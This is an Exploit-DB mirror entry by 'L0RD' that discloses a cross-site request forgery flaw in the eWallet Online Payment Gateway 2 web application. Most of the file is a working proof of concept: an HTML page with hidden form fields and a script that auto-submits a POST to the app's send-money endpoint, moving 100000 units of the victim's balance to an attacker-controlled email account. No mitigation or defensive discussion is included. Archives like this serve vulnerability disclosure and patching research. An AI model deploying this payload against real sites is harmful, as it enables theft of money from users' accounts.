exploit-db-mirror/exploits/php/webapps/44732.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
901 B
Text

# Exploit Title: eWallet - Online Payment Gateway 2 - Cross-Site Request Forgery
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/ewallet-online-payment-gateway/19316332?s_rank=1110
# Version: 2
# Tested on: Kali linux
# POC :
# eWallet - Online Payment Gateway 2 suffers from csrf vulnerability .
# Attacker can send target account balance to his account .
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://idealbrothers.thesoftking.com/walletv2/account/Sent" method="POST">
<input type="hidden" name="sendto" value="lord&#64;yahoo&#46;com" />
<input type="hidden" name="amount" value="100000" />
<input type="hidden" name="charge" value="on" />
<input type="hidden" name="message" value="test" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>